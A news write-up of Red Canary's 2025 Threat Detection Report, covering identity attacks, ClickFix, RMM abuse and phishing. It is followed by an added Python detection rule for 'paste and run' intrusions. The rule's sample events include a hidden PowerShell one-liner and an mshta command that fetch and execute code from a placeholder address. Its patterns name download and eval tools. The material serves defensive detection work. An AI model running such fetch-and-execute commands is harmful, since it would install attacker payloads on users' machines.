Red Canary Details Growth in Identity-Enabled Attacks

MDR firm Red Canary has published its seventh annual Threat Detection Report, which examines the trends, threats and adversary techniques that organizations should prioritize in the coming months and years. The report tracks the MITRE ATT&CK techniques that adversaries abuse most frequently. This year's edition recorded four times as many identity attacks as the 2024 edition. After debuting in the top 10 in 2024, cloud-native and identity-enabled techniques surged in this year's report, with cloud accounts, email forwarding rules and email hiding rules all ranking among the top five.

“2024 marked the rise of cloud-native and identity-enabled attacks, with three of the top five techniques we detected falling into these categories,” said Keith McCammon, co-founder and CSO, Red Canary. “This highlights the immense value adversaries place on identities – compromise one, and they gain access to countless systems. Unfortunately, the rise of identity and access management (IAM) and identity providers hasn’t deterred adversaries. Instead, it has made centralized identities even more lucrative targets as once compromised, adversaries can gain access to numerous disparate systems. Organizations must recognize identities as a frontline for defense and strengthen their security posture to stay ahead of adversaries.”

The data behind Red Canary’s report is not merely raw software signals: the data set is the product of hundreds of thousands of investigations across millions of protected systems and identities. Every threat Red Canary detected in 2024 had already slipped past the customers’ existing, often extensive, security controls; catching them is the result of the breadth and depth of visibility Red Canary applies to threats that would otherwise go undetected.

Red Canary’s 2025 report provides in-depth analysis of nearly 93,000 threats detected over the past year within more than 308 petabytes of security telemetry from customers’ endpoints, networks, cloud infrastructure, identities and SaaS applications. The total number of threats detected increased by more than a third compared with the 2024 report, a result not only of more customers but also of Red Canary’s expanded visibility into cloud and identity infrastructure.

Analysis shows that while the threat landscape continues to shift and evolve, adversaries’ motivations do not. The tools and techniques they deploy also remain largely consistent, with some notable exceptions.

Key findings include: 

  • One of the most successful new initial access techniques observed this year was “paste and run,” also known as “ClickFix” and “fakeCAPTCHA.”
  • Organizations in the educational services sector accounted for 63 percent of all observed VPN use, a disproportionately high share given the sector’s smaller presence in Red Canary’s data.
  • Malicious use of NetSupport Manager broke into Red Canary’s yearly top 10 threats, highlighting the popularity of remote monitoring and management (RMM) tools among adversaries.
  • Email, QR code (“quishing”), SMS and voice phishing attacks all increased in 2024.
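The “paste and run” finding above is a host-visible technique, so here is a detection sketch for it. This is an added example, not code from Red Canary or from the report. It assumes (as general knowledge about ClickFix lures, not as a claim the report makes) that the lure talks the user into pasting a clipboard-loaded one-liner into the Windows Run dialog or a terminal, which leaves a scripting host (powershell.exe, cmd.exe, mshta.exe and the like) spawned directly from explorer.exe with a command line that hides its window, decodes or evaluates content, or fetches a remote payload. The tab-separated event format, the indicator list and every sample event are constructed for the example.

```python
"""
Detection sketch for "paste and run" (ClickFix / fakeCAPTCHA) initial access.

Added example; not Red Canary code. The parent/child process relationship
and the command-line indicators are assumptions about how the technique
typically looks on a host, not findings quoted from the report. Event format
and sample events are constructed.
"""
import re
from dataclasses import dataclass

# Scripting hosts a pasted one-liner usually ends up in (assumed list).
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
               "wscript.exe", "cscript.exe"}
# A Win+R / Run-dialog launch shows explorer.exe as the parent process.
USER_SHELL_PARENTS = {"explorer.exe"}

# Command-line traits commonly paired with a pasted one-liner (assumed, not exhaustive).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    "encoded_cmd":   re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download":      re.compile(r"(?:iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|bitsadmin)", re.I),
    "eval":          re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "mshta_url":     re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed tab-separated 'Key=Value' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.rstrip("\n").split("\t"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list:
    """Return the indicator names that fire, or [] if the event is not suspicious.

    All three conditions must hold: a scripting host, launched from the user
    shell, with at least one suspicious command-line trait. Requiring the
    trait keeps a user simply opening PowerShell from the Start menu quiet.
    """
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    if (basename(ev.image) in SHELL_HOSTS
            and basename(ev.parent_image) in USER_SHELL_PARENTS
            and hits):
        return hits
    return []


def detect(lines) -> list:
    """Run the rule over raw event lines; return (child image, indicators) per hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = score_event(ev)
        if hits:
            findings.append((basename(ev.image), hits))
    return findings


def rec(parent: str, image: str, cmd: str) -> str:
    """Build one constructed event line in the format parse_event expects."""
    return "\t".join([f"ParentImage={parent}", f"Image={image}", f"CommandLine={cmd}"])


# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    # 1. ClickFix-style: pasted into Run, hidden window, fetch-and-eval.
    rec(r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -w hidden -c \"iex (iwr 'http://203.0.113.10/verify')\""),
    # 2. Benign: user opened an interactive PowerShell window.
    rec(r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe"),
    # 3. Admin script: encoded command, but parent is cmd.exe, not the user shell.
    rec(r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEEAYwB0AGkAdgBlAEQA"),
    # 4. ClickFix-style variant: mshta pointed at a remote .hta.
    rec(r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\mshta.exe",
        "mshta.exe https://203.0.113.10/captcha.hta"),
]

if __name__ == "__main__":
    for image, hits in detect(SAMPLE_EVENTS):
        print(f"suspicious paste-and-run candidate: {image} {hits}")
```

Event 3 is deliberately left unflagged: an encoded command under a non-interactive parent is worth a separate rule, but folding it into this one would bury the Run-dialog signal that distinguishes a pasted lure from routine automation. Expect to tune the parent list and indicators against your own baseline, since developers and administrators also launch shells from explorer.exe.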